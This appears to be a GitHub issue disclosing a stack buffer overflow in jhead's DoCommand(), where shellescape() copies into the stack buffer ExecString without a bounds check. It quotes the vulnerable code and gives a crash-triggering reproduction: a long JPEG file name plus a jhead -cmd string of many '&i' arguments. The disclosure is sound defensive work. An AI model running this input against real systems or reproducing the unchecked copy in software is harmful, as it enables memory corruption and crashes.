You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
// Needs an output file distinct from the input file.
e+=shellescape(ExecString+e, TempName);
a+=1;
TempUsed= TRUE;
continue;
}
}
ExecString[e++] =ApplyCommand[a];
if (ApplyCommand[a] ==0) break;
In DoCommand(), jhead calls shellescape() to copy strings to stack buffer ExecString when it detects a &i or &o. However, jhead does not check the boundary of the stack buffer ExecString. As a result, the stack buffer will overflow when multiple &i given.
Rename a jpeg file to a long name, such as _imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpeg
When the command contains lots of
&iargument, the stack buffer will overflow.jhead/jhead.c
Lines 389 to 406 in 0e98605
In
DoCommand(), jhead callsshellescape()to copy strings to stack bufferExecStringwhen it detects a&ior&o. However, jhead does not check the boundary of the stack bufferExecString. As a result, the stack buffer will overflow when multiple&igiven.Test Environment
Ubuntu 20.04, 64 bit
jhead (master, 0e98605)
How to trigger
_imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpeg$ jhead -cmd "&i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &i &p" ./_imageaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpegDetails
ASAN report
The text was updated successfully, but these errors were encountered: